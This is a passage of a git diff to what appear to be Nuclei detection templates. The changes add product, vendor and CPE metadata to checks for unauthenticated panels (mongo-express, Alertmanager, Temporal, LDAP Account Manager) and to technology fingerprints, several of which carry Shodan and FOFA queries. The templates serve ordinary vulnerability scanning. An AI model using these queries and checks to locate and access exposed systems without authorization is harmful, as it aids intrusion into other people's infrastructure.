shodan-query: http.title:"LDAP Account Manager"
+ product: ldap_account_manager
+ vendor: ldap-account-manager
tags: ldap,misconfig,unauth
+ classification:
+ cpe: cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +38,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100eb37d1c6fabba844b609feb86ee959249326bf888667b194afcb0ff37dd9e91b022037213b13d2f0a714a76ac3f03bd64b5ef49037ed317d3da37ca410ff3d459d98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100eb37d1c6fabba844b609feb86ee959249326bf888667b194afcb0ff37dd9e91b022037213b13d2f0a714a76ac3f03bd64b5ef49037ed317d3da37ca410ff3d459d98:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/unauth-mercurial.yaml b/http/misconfiguration/unauth-mercurial.yaml
index d0d7545fa2..2b977f0b60 100644
--- a/http/misconfiguration/unauth-mercurial.yaml
+++ b/http/misconfiguration/unauth-mercurial.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"Mercurial repositories index"
+ product: mercurial
+ vendor: mercurial
tags: misconfig,unauth,mercurial
+ classification:
+ cpe: cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +32,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100f039fb9fa153dfcc07c3b410d3a44973ec66f34f513aa70515ff06ed8fca7f81022041dd62f921a62c32553f6a37ea7ab4e78cd7eea7885fe645b5e69c6bd2db7f8e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f039fb9fa153dfcc07c3b410d3a44973ec66f34f513aa70515ff06ed8fca7f81022041dd62f921a62c32553f6a37ea7ab4e78cd7eea7885fe645b5e69c6bd2db7f8e:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/unauth-temporal-web-ui.yaml b/http/misconfiguration/unauth-temporal-web-ui.yaml
index 5a81343763..c2a73c5805 100644
--- a/http/misconfiguration/unauth-temporal-web-ui.yaml
+++ b/http/misconfiguration/unauth-temporal-web-ui.yaml
@@ -11,10 +11,13 @@ info:
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
+ cpe: cpe:2.3:a:temporal:temporal:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 2
shodan-query: http.favicon.hash:557327884
+ product: temporal
+ vendor: temporal
tags: misconfig,temporal,unauth
http:
@@ -34,4 +37,4 @@ http:
- "contains(body_2, 'nextPageToken') && status_code_2 == 200"
- "contains(body_2, 'Namespace default is not found.') && status_code_2 == 404"
condition: or
-# digest: 4b0a00483046022100e23471f799588e5121a981fa02bd8b1490449748125c06235ea2e1607e2439e3022100a92beae88b23261b448c696a9863d008afae153ea3759317a41ef9958c02e31e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e23471f799588e5121a981fa02bd8b1490449748125c06235ea2e1607e2439e3022100a92beae88b23261b448c696a9863d008afae153ea3759317a41ef9958c02e31e:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/unauthenticated-alert-manager.yaml b/http/misconfiguration/unauthenticated-alert-manager.yaml
index c5843aa5ef..5b08cfa491 100644
--- a/http/misconfiguration/unauthenticated-alert-manager.yaml
+++ b/http/misconfiguration/unauthenticated-alert-manager.yaml
@@ -8,8 +8,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Alertmanager"
+ product: alertmanager
+ vendor: prometheus
tags: unauth,alertmanager,misconfig
+ classification:
+ cpe: cpe:2.3:a:prometheus:alertmanager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/unauthenticated-mongo-express.yaml b/http/misconfiguration/unauthenticated-mongo-express.yaml
index 8ca44f5954..4e356dd670 100644
--- a/http/misconfiguration/unauthenticated-mongo-express.yaml
+++ b/http/misconfiguration/unauthenticated-mongo-express.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 3
shodan-query: title:"Home - Mongo Express"
+ product: mongo-express
+ vendor: mongo-express_project
tags: mongo,unauth,edb,misconfig
+ classification:
+ cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/unauthorized-h3csecparh-login.yaml b/http/misconfiguration/unauthorized-h3csecparh-login.yaml
index a4d8964e36..7a6ca2b072 100644
--- a/http/misconfiguration/unauthorized-h3csecparh-login.yaml
+++ b/http/misconfiguration/unauthorized-h3csecparh-login.yaml
@@ -10,8 +10,12 @@ info:
max-request: 1
shodan-query: http.html:"H3C-SecPath-运维审计系统"
fofa-query: app="H3C-SecPath-运维审计系统" && body="2018"
+ product: secpath_f5060
+ vendor: h3c
tags: h3c,default-login,unauth,misconfig
+ classification:
+ cpe: cpe:2.3:h:h3c:secpath_f5060:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/misconfiguration/untangle-admin-setup.yaml b/http/misconfiguration/untangle-admin-setup.yaml
index 1ea0c52d38..9ffc666929 100644
--- a/http/misconfiguration/untangle-admin-setup.yaml
+++ b/http/misconfiguration/untangle-admin-setup.yaml
@@ -10,8 +10,12 @@ info:
max-request: 1
shodan-query: title:"Setup Wizard" html:"untangle"
fofa-query: title="Setup Wizard" && "untangle"
+ product: ng_firewall
+ vendor: untangle
tags: misconfig,untangle,admin,setup
+ classification:
+ cpe: cpe:2.3:a:untangle:ng_firewall:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +33,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100d42c9165fc09a3a5155eb20e9de1d953b57381acddd1ce6942fe386dea3d884c022052d8ec52b7ebebbb449b6e557920fbf94eb672e29a82ffd7a8bb479cac842ccc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d42c9165fc09a3a5155eb20e9de1d953b57381acddd1ce6942fe386dea3d884c022052d8ec52b7ebebbb449b6e557920fbf94eb672e29a82ffd7a8bb479cac842ccc:922c64590222798bb761d5b6d8e72950
diff --git a/http/misconfiguration/zabbix-error.yaml b/http/misconfiguration/zabbix-error.yaml
index 7b328f08f6..ff003d566e 100644
--- a/http/misconfiguration/zabbix-error.yaml
+++ b/http/misconfiguration/zabbix-error.yaml
@@ -9,9 +9,12 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:zabbix:zabbix_server:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"Warning [refreshed every 30 sec.]"
+ product: zabbix_server
+ vendor: zabbix
tags: zabbix,misconfig
http:
diff --git a/http/technologies/4D-detect.yaml b/http/technologies/4D-detect.yaml
index 094712f06e..1c1b41754a 100644
--- a/http/technologies/4D-detect.yaml
+++ b/http/technologies/4D-detect.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"4DACTION/"
+ product: 4d
+ vendor: 4d
tags: 4D,detect,tech
+ classification:
+ cpe: cpe:2.3:a:4d:4d:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -44,4 +48,4 @@ http:
group: 1
regex:
- 'Server:\s+4D(?:_V[0-9]+)?/([0-9.]+)'
-# digest: 4b0a00483046022100f7a8acd9ea27d789dfe331eff80913f64f9ee6fe84c386fab6035b8ea0fa2bb602210091d93c4de5b4d1c943d244e07faf8403d8c4b2b59c5716ca5810cb9987ca6384:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f7a8acd9ea27d789dfe331eff80913f64f9ee6fe84c386fab6035b8ea0fa2bb602210091d93c4de5b4d1c943d244e07faf8403d8c4b2b59c5716ca5810cb9987ca6384:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/activecollab-detect.yaml b/http/technologies/activecollab-detect.yaml
index 6471974f26..40a67a5a6a 100644
--- a/http/technologies/activecollab-detect.yaml
+++ b/http/technologies/activecollab-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
fofa-query: app="ActiveCollab"
+ product: activecollab
+ vendor: activecollab
tags: acsoft,tech,activecollab
+ classification:
+ cpe: cpe:2.3:a:activecollab:activecollab:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/adobe/adobe-coldfusion-detect.yaml b/http/technologies/adobe/adobe-coldfusion-detect.yaml
index e19f7d4be2..44c32cbc88 100644
--- a/http/technologies/adobe/adobe-coldfusion-detect.yaml
+++ b/http/technologies/adobe/adobe-coldfusion-detect.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 6
shodan-query: http.component:"Adobe ColdFusion"
+ product: coldfusion
+ vendor: adobe
tags: adobe,coldfusion,tech
+ classification:
+ cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml
index efe9fab702..5790db3e1b 100644
--- a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml
+++ b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 1
shodan-query: http.component:"Adobe ColdFusion"
+ product: coldfusion
+ vendor: adobe
tags: adobe,coldfusion,tech
+ classification:
+ cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/aem-detect.yaml b/http/technologies/aem-detect.yaml
index c40b6cfa15..f4b0c6a8f5 100644
--- a/http/technologies/aem-detect.yaml
+++ b/http/technologies/aem-detect.yaml
@@ -13,8 +13,12 @@ info:
metadata:
max-request: 1
shodan-query: http.component:"Adobe Experience Manager"
+ product: experience_manager
+ vendor: adobe
tags: aem,favicon,tech,adobe
+ classification:
+ cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/aerocms-detect.yaml b/http/technologies/aerocms-detect.yaml
index 83a10cdf56..a3127078cd 100644
--- a/http/technologies/aerocms-detect.yaml
+++ b/http/technologies/aerocms-detect.yaml
@@ -9,8 +9,12 @@ info:
max-request: 1
shodan-query: title:"AeroCMS"
fofa-query: "AeroCMS"
+ product: aerocms
+ vendor: aerocms_project
tags: tech,aerocms
+ classification:
+ cpe: cpe:2.3:a:aerocms_project:aerocms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/angular-detect.yaml b/http/technologies/angular-detect.yaml
index ee01efcaa1..a918d681a8 100644
--- a/http/technologies/angular-detect.yaml
+++ b/http/technologies/angular-detect.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"ng-version="
+ product: angular
+ vendor: angular
tags: tech,angular
+ classification:
+ cpe: cpe:2.3:a:angular:angular:*:*:*:*:node.js:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/airflow-detect.yaml b/http/technologies/apache/airflow-detect.yaml
index 89e53422cc..24ff2e4a76 100644
--- a/http/technologies/apache/airflow-detect.yaml
+++ b/http/technologies/apache/airflow-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"Apache Airflow"
+ product: airflow
+ vendor: apache
tags: tech,apache,airflow,intrusive
+ classification:
+ cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,4 +29,4 @@ http:
- type: status
status:
- 404
-# digest: 4a0a00473045022100ed59cfb6802724e34fa5894563277a64889f3676ae6cdae4875a59bfd9e5366a02207589bb03b56a052916e5db355e492f5168909e2051039e97f66022052d90d590:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ed59cfb6802724e34fa5894563277a64889f3676ae6cdae4875a59bfd9e5366a02207589bb03b56a052916e5db355e492f5168909e2051039e97f66022052d90d590:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml
index d6ee28ddba..c6348a58f6 100644
--- a/http/technologies/apache/apache-answer-detect.yaml
+++ b/http/technologies/apache/apache-answer-detect.yaml
@@ -13,8 +13,12 @@ info:
max-request: 1
shodan-query: http.favicon.hash:523757057
fofa-query: icon_hash="523757057"
+ product: answer
+ vendor: apache
tags: detect,tech,apache
+ classification:
+ cpe: cpe:2.3:a:apache:answer:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -42,4 +46,4 @@ http:
name: version
regex:
- '"version":"([^"]+)"'
-# digest: 4a0a004730450221009e8fd14022f6b92bd8f4859cea0b49820934628bc139239ba58c7c4f268a0bf6022064c229196be4da31c1f58e14368f395bf82afcd2e8679e584116bfd400b2dd2c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009e8fd14022f6b92bd8f4859cea0b49820934628bc139239ba58c7c4f268a0bf6022064c229196be4da31c1f58e14368f395bf82afcd2e8679e584116bfd400b2dd2c:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/apache/apache-axis-detect.yaml b/http/technologies/apache/apache-axis-detect.yaml
index 541ec83207..1cdab8933b 100644
--- a/http/technologies/apache/apache-axis-detect.yaml
+++ b/http/technologies/apache/apache-axis-detect.yaml
@@ -9,8 +9,12 @@ info:
verified: true
max-request: 3
shodan-query: http.html:"Apache Axis"
+ product: axis
+ vendor: apache
tags: tech,axis2,middleware,apache
+ classification:
+ cpe: cpe:2.3:a:apache:axis:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/apache-cloudstack-detect.yaml b/http/technologies/apache/apache-cloudstack-detect.yaml
index bff3d8bc77..2e168fbf59 100644
--- a/http/technologies/apache/apache-cloudstack-detect.yaml
+++ b/http/technologies/apache/apache-cloudstack-detect.yaml
@@ -4,12 +4,15 @@ info:
name: Apache CloudStack - Detect
author: pussycat0x
severity: info
- description:
- CloudStack is open-source Infrastructure-as-a-Service cloud computing software for creating, managing, and deploying infrastructure cloud services. It uses existing hypervisor platforms for virtualization, such as KVM, VMware vSphere, including ESXi and vCenter, XenServer/XCP and XCP-ng.
+ description: CloudStack is open-source Infrastructure-as-a-Service cloud computing software for creating, managing, and deploying infrastructure cloud services. It uses existing hypervisor platforms for virtualization, such as KVM, VMware vSphere, including ESXi and vCenter, XenServer/XCP and XCP-ng.
metadata:
shodan-query: http.title:"Apache CloudStack"
+ product: cloudstack
+ vendor: apache
tags: tech,apache,cloudstack
+ classification:
+ cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,4 +29,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220268e39fea1438b8ede541f545337c0c6f6027159cbd433c75bd0f9be63877ea6022100b842369be9a18c54da45a39a9f188c687b365eb23b3869afadd42c22b7dbea08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220268e39fea1438b8ede541f545337c0c6f6027159cbd433c75bd0f9be63877ea6022100b842369be9a18c54da45a39a9f188c687b365eb23b3869afadd42c22b7dbea08:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/apache/apache-cocoon-detect.yaml b/http/technologies/apache/apache-cocoon-detect.yaml
index 64f8870cf3..f59e8702da 100644
--- a/http/technologies/apache/apache-cocoon-detect.yaml
+++ b/http/technologies/apache/apache-cocoon-detect.yaml
@@ -9,8 +9,12 @@ info:
max-request: 1
shodan-query: http.html:"Apache Cocoon"
fofa-query: app="APACHE-Cocoon"
+ product: cocoon
+ vendor: apache
tags: apache,cocoon,tech
+ classification:
+ cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/apache-dubbo-detect.yaml b/http/technologies/apache/apache-dubbo-detect.yaml
index abc3adf65b..bf2190dd5c 100644
--- a/http/technologies/apache/apache-dubbo-detect.yaml
+++ b/http/technologies/apache/apache-dubbo-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
fofa-query: app="APACHE-dubbo"
+ product: dubbo
+ vendor: apache
tags: apache,dubbo,tech
+ classification:
+ cpe: cpe:2.3:a:apache:dubbo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/apache-karaf-panel.yaml b/http/technologies/apache/apache-karaf-panel.yaml
index 367f6dd2ce..106ae8c27a 100644
--- a/http/technologies/apache/apache-karaf-panel.yaml
+++ b/http/technologies/apache/apache-karaf-panel.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: realm="karaf"
+ product: karaf
+ vendor: apache
tags: tech,apache,karaf
+ classification:
+ cpe: cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/apache-ofbiz-detect.yaml b/http/technologies/apache/apache-ofbiz-detect.yaml
index 934dce72d3..3ccf78bbe3 100644
--- a/http/technologies/apache/apache-ofbiz-detect.yaml
+++ b/http/technologies/apache/apache-ofbiz-detect.yaml
@@ -1,35 +1,39 @@
-id: apache-ofbiz-detect
-
-info:
- name: Apache OFBiz - Detect
- author: rxerium
- severity: info
- description: |
- An Apache OFBiz instance was detected.
- metadata:
- max-request: 1
- verified: true
- fofa-query: app="Apache_OFBiz"
- tags: tech,detect,ofbiz,apache
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- host-redirects: true
- max-redirects: 2
-
- matchers-condition: and
- matchers:
- - type: word
- part: response
- words:
- - "OFBiz.Visitor="
- - "Apache OFBiz."
- condition: or
-
- - type: status
- status:
+id: apache-ofbiz-detect
+
+info:
+ name: Apache OFBiz - Detect
+ author: rxerium
+ severity: info
+ description: |
+ An Apache OFBiz instance was detected.
+ metadata:
+ max-request: 1
+ verified: true
+ fofa-query: app="Apache_OFBiz"
+ product: ofbiz
+ vendor: apache
+ tags: tech,detect,ofbiz,apache
+
+ classification:
+ cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ host-redirects: true
+ max-redirects: 2
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: response
+ words:
+ - "OFBiz.Visitor="
+ - "Apache OFBiz."
+ condition: or
+
+ - type: status
+ status:
- 200
-# digest: 4a0a0047304502205d30594f5f64af924626e422439a11d6e24629c45c00ae7205f429e2c4abbbaa022100f70e9d73c15c34ebc36d041cc57695a3fca5428b9d23fe32cec394ec9e74f09b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205d30594f5f64af924626e422439a11d6e24629c45c00ae7205f429e2c4abbbaa022100f70e9d73c15c34ebc36d041cc57695a3fca5428b9d23fe32cec394ec9e74f09b:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/apache/apache-streampipes-detect.yaml b/http/technologies/apache/apache-streampipes-detect.yaml
index 3a7cfa68a8..1974ae46c5 100644
--- a/http/technologies/apache/apache-streampipes-detect.yaml
+++ b/http/technologies/apache/apache-streampipes-detect.yaml
@@ -1,40 +1,44 @@
-id: apache-streampipes-detect
-
-info:
- name: Apache StreamPipes - Detect
- author: Alessandro Albani - DEVisions
- severity: info
- description: |
- Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash.
- metadata:
- max-request: 3
- verified: true
- shodan-query: title:"apache streampipes"
- fofa-query: title="apache streampipes"
- tags: tech,apache,streampipes,detect
-
-http:
- - method: GET
- path:
- - '{{BaseURL}}/streampipes-backend/api/openapi.json'
- - '{{BaseURL}}/assets/img/favicon/favicon.ico'
- - '{{BaseURL}}'
-
- host-redirects: true
- max-redirects: 2
- stop-at-first-match: true
-
- matchers:
- - type: dsl
- dsl:
- - contains_any(to_lower(body), "apache streampipes", "apache streampipes api")
- - status_code==200 && ("1937041138" == mmh3(base64_py(body)) || "480680877" == mmh3(base64_py(body)))
- condition: or
-
- extractors:
- - type: json
- part: body
- group: 1
- json:
+id: apache-streampipes-detect
+
+info:
+ name: Apache StreamPipes - Detect
+ author: Alessandro Albani - DEVisions
+ severity: info
+ description: |
+ Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash.
+ metadata:
+ max-request: 3
+ verified: true
+ shodan-query: title:"apache streampipes"
+ fofa-query: title="apache streampipes"
+ product: streampipes
+ vendor: apache
+ tags: tech,apache,streampipes,detect
+
+ classification:
+ cpe: cpe:2.3:a:apache:streampipes:*:*:*:*:*:*:*:*
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/streampipes-backend/api/openapi.json'
+ - '{{BaseURL}}/assets/img/favicon/favicon.ico'
+ - '{{BaseURL}}'
+
+ host-redirects: true
+ max-redirects: 2
+ stop-at-first-match: true
+
+ matchers:
+ - type: dsl
+ dsl:
+ - contains_any(to_lower(body), "apache streampipes", "apache streampipes api")
+ - status_code==200 && ("1937041138" == mmh3(base64_py(body)) || "480680877" == mmh3(base64_py(body)))
+ condition: or
+
+ extractors:
+ - type: json
+ part: body
+ group: 1
+ json:
- '.info.version'
-# digest: 4a0a00473045022100e844168305f85d35d0d27540e7184cfcac442f22a9422989e405991f0b9574e702205c83386f56fce761314655189f2f551a2b4b82f7929bd3e46ef8b1fc948db36d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e844168305f85d35d0d27540e7184cfcac442f22a9422989e405991f0b9574e702205c83386f56fce761314655189f2f551a2b4b82f7929bd3e46ef8b1fc948db36d:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/apache/apache-tapestry-detect.yaml b/http/technologies/apache/apache-tapestry-detect.yaml
index 48eede8c46..9260cad651 100644
--- a/http/technologies/apache/apache-tapestry-detect.yaml
+++ b/http/technologies/apache/apache-tapestry-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
fofa-query: app="APACHE-Tapestry"
+ product: tapestry
+ vendor: apache
tags: apache,tapestry,tech
+ classification:
+ cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/apache-zeppelin-detect.yaml b/http/technologies/apache/apache-zeppelin-detect.yaml
index dd64a6b61f..119d24914e 100644
--- a/http/technologies/apache/apache-zeppelin-detect.yaml
+++ b/http/technologies/apache/apache-zeppelin-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
fofa-query: app="APACHE-Zeppelin"
+ product: zeppelin
+ vendor: apache
tags: apache,zeppelin,tech
+ classification:
+ cpe: cpe:2.3:a:apache:zeppelin:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/default-apache-test-all.yaml b/http/technologies/apache/default-apache-test-all.yaml
index 66fa6a759e..decf00e308 100644
--- a/http/technologies/apache/default-apache-test-all.yaml
+++ b/http/technologies/apache/default-apache-test-all.yaml
@@ -8,8 +8,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works"
+ product: http_server
+ vendor: apache
tags: tech,apache
+ classification:
+ cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/default-apache-test-page.yaml b/http/technologies/apache/default-apache-test-page.yaml
index 268acbeed0..f9fdc9ae28 100644
--- a/http/technologies/apache/default-apache-test-page.yaml
+++ b/http/technologies/apache/default-apache-test-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS"
+ product: http_server
+ vendor: apache
tags: tech,apache
+ classification:
+ cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/default-apache2-page.yaml b/http/technologies/apache/default-apache2-page.yaml
index 2aa462ac02..537a73eccf 100644
--- a/http/technologies/apache/default-apache2-page.yaml
+++ b/http/technologies/apache/default-apache2-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"Apache2 Debian Default Page:"
+ product: http_server
+ vendor: apache
tags: tech,apache
+ classification:
+ cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/ranger-detection.yaml b/http/technologies/apache/ranger-detection.yaml
index e14f4d6621..c68fd1fcfa 100644
--- a/http/technologies/apache/ranger-detection.yaml
+++ b/http/technologies/apache/ranger-detection.yaml
@@ -8,8 +8,12 @@ info:
metadata:
max-request: 2
shodan-query: http.title:"Ranger - Sign In"
+ product: ranger
+ vendor: apache
tags: tech,apache,ranger
+ classification:
+ cpe: cpe:2.3:a:apache:ranger:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/apache/xampp-default-page.yaml b/http/technologies/apache/xampp-default-page.yaml
index 30f3d06f34..bc4c9bc794 100644
--- a/http/technologies/apache/xampp-default-page.yaml
+++ b/http/technologies/apache/xampp-default-page.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"XAMPP"
+ product: xampp
+ vendor: apachefriends
tags: tech,php,xampp,apache
+ classification:
+ cpe: cpe:2.3:a:apachefriends:xampp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/appcms-detect.yaml b/http/technologies/appcms-detect.yaml
index 0e8a6fb38d..87432ac4fe 100644
--- a/http/technologies/appcms-detect.yaml
+++ b/http/technologies/appcms-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.html:"Powerd by AppCMS"
+ product: appcms
+ vendor: appcms
tags: tech,appcms
+ classification:
+ cpe: cpe:2.3:a:appcms:appcms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/autobahn-python-detect.yaml b/http/technologies/autobahn-python-detect.yaml
index 5697bfc546..1cc2c24c59 100644
--- a/http/technologies/autobahn-python-detect.yaml
+++ b/http/technologies/autobahn-python-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: "AutobahnPython"
+ product: autobahn
+ vendor: crossbar
tags: tech,webserver
+ classification:
+ cpe: cpe:2.3:a:crossbar:autobahn:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/avideo-detect.yaml b/http/technologies/avideo-detect.yaml
index 2f299a1fd5..8aca9952e5 100644
--- a/http/technologies/avideo-detect.yaml
+++ b/http/technologies/avideo-detect.yaml
@@ -9,8 +9,12 @@ info:
max-request: 1
shodan-query: http.title:"AVideo"
fofa-query: "AVideo"
+ product: avideo
+ vendor: wwbn
tags: tech,avideo
+ classification:
+ cpe: cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/b2b-builder-detect.yaml b/http/technologies/b2b-builder-detect.yaml
index 1932c28e53..f4c634db03 100644
--- a/http/technologies/b2b-builder-detect.yaml
+++ b/http/technologies/b2b-builder-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
fofa-query: app="B2BBuilder"
+ product: b2b_script
+ vendor: itechscripts
tags: b2bbuilder,tech
+ classification:
+ cpe: cpe:2.3:a:itechscripts:b2b_script:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/bamboo-detect.yaml b/http/technologies/bamboo-detect.yaml
index b4cf9aa185..26d0671e6b 100644
--- a/http/technologies/bamboo-detect.yaml
+++ b/http/technologies/bamboo-detect.yaml
@@ -12,8 +12,11 @@ info:
vendor: atlassian
shodan-query: http.favicon.hash:-1379982221
category: devops
+ product: bamboo
tags: tech,bamboo,atlassian,detect,cicd
+ classification:
+ cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +35,4 @@ http:
group: 1
regex:
- '(?i)atlassian bamboo version (.*) -'
-# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/bigbluebutton-detect.yaml b/http/technologies/bigbluebutton-detect.yaml
index 2a62d9cd24..5149cf1409 100644
--- a/http/technologies/bigbluebutton-detect.yaml
+++ b/http/technologies/bigbluebutton-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"BigBlueButton"
+ product: bigbluebutton
+ vendor: bigbluebutton
tags: tech,bigbluebutton
+ classification:
+ cpe: cpe:2.3:a:bigbluebutton:bigbluebutton:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/bigip-apm-detect.yaml b/http/technologies/bigip-apm-detect.yaml
index 1ac91d24c2..fc0b213b85 100644
--- a/http/technologies/bigip-apm-detect.yaml
+++ b/http/technologies/bigip-apm-detect.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 2
shodan-query: html:"BIG-IP APM"
+ product: big-ip_access_policy_manager
+ vendor: f5
tags: bigip,tech,f5,detect
+ classification:
+ cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
